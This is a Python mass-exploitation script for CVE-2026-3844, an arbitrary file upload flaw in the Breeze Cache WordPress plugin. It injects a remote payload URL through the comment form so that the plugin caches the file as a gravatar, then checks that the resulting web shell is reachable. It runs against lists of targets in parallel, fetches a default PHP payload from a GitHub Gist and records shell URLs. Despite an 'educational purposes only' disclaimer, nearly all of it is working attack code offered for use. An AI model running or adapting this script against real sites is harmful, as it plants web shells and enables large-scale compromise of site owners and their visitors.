#!/usr/bin/env python3 """ CVE-2026-3844 Mass Exploitation - Breeze Cache Arbitrary File Upload By IM-Hanzou - Educational purposes only! """ import pycurl import random import string import sys import time import os from io import BytesIO from urllib.parse import urlparse from colorama import Fore, Style, init from multiprocessing import Pool, Manager, Lock import argparse init(autoreset=True) RESULTS_FILE = "successful_uploads.txt" def generate_marker(length=12): return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def get_file_extension(url): path = urlparse(url).path ext = os.path.splitext(path)[1] return ext if ext else '.php' def save_result(target, shell_url, lock): with lock: with open(RESULTS_FILE, 'a') as f: f.write(f"{target} | {shell_url}\n") f.flush() def curl_post(url, data, timeout=15): buffer = BytesIO() c = pycurl.Curl() try: c.setopt(c.URL, url) c.setopt(c.POST, 1) c.setopt(c.POSTFIELDS, data) c.setopt(c.WRITEDATA, buffer) c.setopt(c.FOLLOWLOCATION, True) c.setopt(c.TIMEOUT, timeout) c.setopt(c.SSL_VERIFYPEER, 0) c.setopt(c.SSL_VERIFYHOST, 0) c.setopt(c.HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']) c.setopt(c.USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0') c.perform() status_code = c.getinfo(c.RESPONSE_CODE) c.close() return status_code, buffer.getvalue().decode('utf-8', errors='ignore') except Exception as e: c.close() return 0, str(e) def curl_get(url, timeout=15): buffer = BytesIO() c = pycurl.Curl() try: c.setopt(c.URL, url) c.setopt(c.WRITEDATA, buffer) c.setopt(c.FOLLOWLOCATION, False) c.setopt(c.TIMEOUT, timeout) c.setopt(c.SSL_VERIFYPEER, 0) c.setopt(c.SSL_VERIFYHOST, 0) c.setopt(c.USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0') c.perform() status_code = c.getinfo(c.RESPONSE_CODE) c.close() return status_code, buffer.getvalue().decode('utf-8', errors='ignore') except Exception as e: c.close() return 0, str(e) def exploit(args): target_url, payload_url, check_string, timeout, lock = args marker = generate_marker() file_ext = get_file_extension(payload_url) parsed_target = urlparse(target_url) if not parsed_target.scheme: target_url = f"http://{target_url}" parsed_target = urlparse(target_url) base_url = f"{parsed_target.scheme}://{parsed_target.netloc}" print(f"{Fore.CYAN}[>] {Fore.WHITE}{target_url} {Fore.YELLOW}| {marker}{file_ext}") post_data = f"comment_post_ID=1&author=x+srcset={payload_url}&email=breeze{marker}@test.com&comment=test+{marker}&submit=Post+Comment" status, response = curl_post(f"{base_url}/wp-comments-post.php", post_data, timeout) if status in [200, 302, 303]: print(f"{Fore.GREEN} [+] Comment posted") elif status == 0: print(f"{Fore.RED} [-] Connection error") return {'status': 'error', 'target': target_url} else: print(f"{Fore.YELLOW} [!] Status: {status}") time.sleep(10) uploaded_file_url = f"{base_url}/wp-content/cache/breeze-extra/gravatars/{marker}{file_ext}" status, response = curl_get(uploaded_file_url, timeout) if status == 200: if check_string: if check_string in response: print(f"{Fore.GREEN} [SUCCESS] {Fore.CYAN}{uploaded_file_url}") save_result(target_url, uploaded_file_url, lock) return {'status': 'success', 'url': uploaded_file_url, 'target': target_url} else: print(f"{Fore.YELLOW} [UPLOADED] String not found: {Fore.CYAN}{uploaded_file_url}") return {'status': 'uploaded', 'url': uploaded_file_url, 'target': target_url} else: print(f"{Fore.GREEN} [SUCCESS] {Fore.CYAN}{uploaded_file_url}") save_result(target_url, uploaded_file_url, lock) return {'status': 'success', 'url': uploaded_file_url, 'target': target_url} elif status == 404: print(f"{Fore.RED} [-] Not found (404)") return {'status': 'failed', 'target': target_url} else: print(f"{Fore.RED} [-] Status: {status}") return {'status': 'failed', 'target': target_url} def main(): DEFAULT_PAYLOAD = "https://gist.githubusercontent.com/im-hanzou/1768625b0492df34c32fc394835da595/raw/fbe555d4243f90cc0b01c5e2d676453823dfcf9c/CVE-2026-3844.php" DEFAULT_SUCCESS_STRING = "4356452d323032362d33383434" parser = argparse.ArgumentParser( description=f"{Fore.CYAN}IM-Hanzou | CVE-2026-3844 - Breeze Cache Mass Exploit{Style.RESET_ALL}", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=f''' Examples: python3 {sys.argv[0]} -l targets.txt python3 {sys.argv[0]} -l targets.txt -t 20 python3 {sys.argv[0]} -l targets.txt -p https://yourserver.com/shell.php -t 10 python3 {sys.argv[0]} -u http://target.com -p https://yourserver.com/shell.txt ''' ) parser.add_argument('-l', '--list', help='File containing target URLs (one per line)') parser.add_argument('-u', '--url', help='Single target URL') parser.add_argument('-t', '--threads', type=int, default=10, help='Number of processes (default: 10)') parser.add_argument('-p', '--payload', default=DEFAULT_PAYLOAD, help='Payload URL (default: GitHub Gist)') parser.add_argument('--timeout', type=int, default=15, help='Request timeout in seconds (default: 15)') args = parser.parse_args() if not args.list and not args.url: parser.print_help() sys.exit(1) targets = [] if args.url: targets = [args.url] elif args.list: if not os.path.exists(args.list): print(f"{Fore.RED}[-] File not found: {args.list}") sys.exit(1) with open(args.list, 'r') as f: targets = [line.strip() for line in f if line.strip()] if not targets: print(f"{Fore.RED}[-] No targets found in {args.list}") sys.exit(1) is_default_payload = (args.payload == DEFAULT_PAYLOAD) check_string = DEFAULT_SUCCESS_STRING if is_default_payload else None print(f"{Fore.CYAN}{'='*70}") print(f"{Fore.YELLOW}IM-Hanzou | CVE-2026-3844 - Breeze Cache Mass Exploit") print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}") print(f"{Fore.WHITE}Targets: {Fore.GREEN}{len(targets)}") print(f"{Fore.WHITE}Processes: {Fore.GREEN}{args.threads}") print(f"{Fore.WHITE}Payload: {Fore.CYAN}{args.payload}") print(f"{Fore.WHITE}Timeout: {Fore.YELLOW}{args.timeout}s") print(f"{Fore.WHITE}String check: {Fore.YELLOW}{'Enabled' if check_string else 'Disabled (custom payload)'}") print(f"{Fore.GREEN}Initializing...") print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}") print() if os.path.exists(RESULTS_FILE): print(f"{Fore.YELLOW}[!] {RESULTS_FILE} exists, results will be appended{Style.RESET_ALL}") print() manager = Manager() lock = manager.Lock() task_args = [(target, args.payload, check_string, args.timeout, lock) for target in targets] with Pool(processes=args.threads) as pool: results_list = pool.map(exploit, task_args) results = { 'success': [], 'uploaded': [], 'failed': [], 'error': [] } for r in results_list: results[r['status']].append(r) print() print(f"{Fore.CYAN}{'='*70}") print(f"{Fore.YELLOW}EXPLOITATION SUMMARY") print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}") print(f"{Fore.GREEN}Success: {len(results['success'])}") print(f"{Fore.YELLOW}Uploaded (no string): {len(results['uploaded'])}") print(f"{Fore.RED}Failed: {len(results['failed'])}") print(f"{Fore.RED}Error: {len(results['error'])}") print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}") print() if results['success']: print(f"{Fore.GREEN}SUCCESSFUL UPLOADS:") print(f"{Fore.CYAN}{'-'*70}{Style.RESET_ALL}") for r in results['success']: print(f"{Fore.WHITE}Target: {Fore.CYAN}{r['target']}") print(f"{Fore.WHITE}Shell: {Fore.GREEN}{r['url']}") print() if results['uploaded']: print(f"{Fore.YELLOW}UPLOADED (String Not Found):") print(f"{Fore.CYAN}{'-'*70}{Style.RESET_ALL}") for r in results['uploaded']: print(f"{Fore.WHITE}Target: {Fore.CYAN}{r['target']}") print(f"{Fore.WHITE}File: {Fore.YELLOW}{r['url']}") print() if results['success']: print(f"{Fore.GREEN}[+] Results saved to: {Fore.CYAN}{RESULTS_FILE}") print() if __name__ == "__main__": main()